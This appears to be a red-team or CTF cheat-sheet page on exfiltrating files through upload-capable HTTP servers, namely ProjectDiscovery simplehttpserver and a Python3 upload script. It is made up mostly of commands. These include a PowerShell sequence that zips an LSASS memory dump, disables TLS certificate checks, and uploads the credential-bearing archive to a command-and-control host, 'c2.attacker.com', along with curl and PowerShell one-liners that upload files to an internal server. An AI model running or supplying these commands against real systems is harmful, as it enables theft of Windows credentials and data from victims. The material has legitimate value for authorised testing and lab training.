Using Curl to POST data to SimpleHTTPServerWithUpload.py #
ProjectDiscovery SimpleHTTPServer #
- Simple command for running
1 2
simplehttpserver -https -upload simplehttpserver -https -upload -listen 0.0.0.0:443
- Upload a file via curl(Linux) or powershell(Windows). Try to compress first
- Windows
- Powershell
- Possible to convert to one-liner and execute
*
C:\Windows\system32>powershell "<b;e;l;o;w;>"
) * Unzip with7z x lsass.zip
1 2 3 4 5 6
Compress-Archive -LiteralPath C:\Windows\temp\lsass.dmp -DestinationPath C:\Windows\temp\lsass.zip [System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} $uri='https://c2.attacker.com/lsass.zip' $uploadPath = 'C:\Windows\temp\lsass.zip' Invoke-RestMethod -Uri $uri -Method Put -InFile $uploadPath -UseDefaultCredentials"
- Possible to convert to one-liner and execute
*
Python3 SimpleHTTPServer #
- Caveats
- Insecure communications (HTTP)
- Choose a server that accepts POST request and makes use of HTTPS
- Download
- SimpleHTTPServerwithUpload_Python3 from @touilleMan
- Modify listening port
- If you want to change the port that the script is listening to (by default 8000/tcp), use below to replace function "test". (i.e. 1337/tcp)
1 2 3 4
def test(HandlerClass=SimpleHTTPRequestHandler, ServerClass=http.server.HTTPServer): server_address = ('', 1337) httpd = ServerClass(server_address,HandlerClass) httpd.serve_forever()
- From client-side
- Once SimpleHTTPServer is running then: (
python3 SimpleHTTPServerWithUpload.py
) - Linux
1
curl -F "file=@flag.zip" http://10.1.2.3:8000/
- Powershell
1
$wc=New-Object System.Net.WebClient;$resp=$wc.UploadFile('http://10.1.2.3:8000',"C:\Users\Administrator\Desktop\flag.zip")
Last update: April 16, 2022